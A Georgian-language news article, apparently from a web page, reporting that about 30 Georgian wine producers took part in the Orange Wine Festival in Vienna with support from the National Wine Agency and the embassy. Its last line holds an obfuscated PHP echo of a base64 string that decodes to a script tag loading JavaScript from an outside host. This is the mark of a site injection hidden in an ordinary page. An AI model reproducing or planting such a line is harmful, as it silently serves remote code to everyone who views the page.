celsiusi
ავერსი შნაიდერი

ღვინის ეროვნული სააგენტოს და ავსტრიის რესპუბლიკაში საქართველოს საელჩოს მხარდაჭერით, ქართული ღვინის მწარმოებელი 30-მდე კომპანია ავსტრიის დედაქალაქ ვენაში გამართულ ქარვისფერი ღვინოების ფესტივალში - Orange Wine Festival მონაწილეობდა.

ამის შესახებ ინფორმაციას ღვინის ეროვნული სააგენტო ავრცელებს.

როგორც ინფორმაციაშია აღნიშნული, Orange Wine Festival წლის განმავლობაში რამდენჯერმე იმართება მსოფლიოს სხვადასხვა ქვეყანაში. ფესტივალში ქართული ღვინის მარნების მონაწილეობა შესაძლებლობას იძლევა, რომ ქართული ღვინო ფართო მასშტაბით წარმოჩინდეს როგორც მომხმარებლების, ისე ღვინის საერთაშორისო ექსპერტებისა და ღვინით ვაჭრობის სფეროს წარმომადგენლების წინაშე.

წელს ფესტივალზე წარმოდგენილი იყო 100-ზე მეტი მწარმოებლის 350-მდე ღვინო მსოფლიოს 13 ქვეყნიდან: საქართველო, ავსტრია, ჩეხეთი, საფრანგეთი, იტალია, ხორვატია, უნგრეთი, პოლონეთი, ესპანეთი, სლოვენია, სერბეთი, სლოვაკეთი და დიდი ბრიტანეთი. ფესტივალი ხალხმრავალი იყო; სტუმრები განსაკუთრებულ ინტერესს იჩენდნენ ქართული ღვინის მიმართ.

ვენაში გამართულ ფესტივალს ავსტრიის რესპუბლიკაში საქართველოს საქმეთა დროებითი რწმუნებული ალექსანდრე მაისურაძე დაესწრო.

აღსანიშნავია, რომ ღვინის ეროვნული სააგენტოს საქმიანობის ერთ-ერთ ძირითად მიმართულებას საერთაშორისო ბაზრებზე ქართული ღვინის პოპულარიზაცია და ცნობადობის ამაღლება წარმოადგენს. სააგენტო ქართული ღვინის პოპულარიზაციის ხელშეწყობის ფარგლებში, 2013 წლიდან, ბაზრების დივერსიფიცირების მიზნით, სარეკლამო-მარკეტინგულ კამპანიებს აშშ-ში, ევროპისა და სამხრეთ-აღმოსავლეთ აზიის ქვეყნებში ინტენსიურად ახორციელებს.

52
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");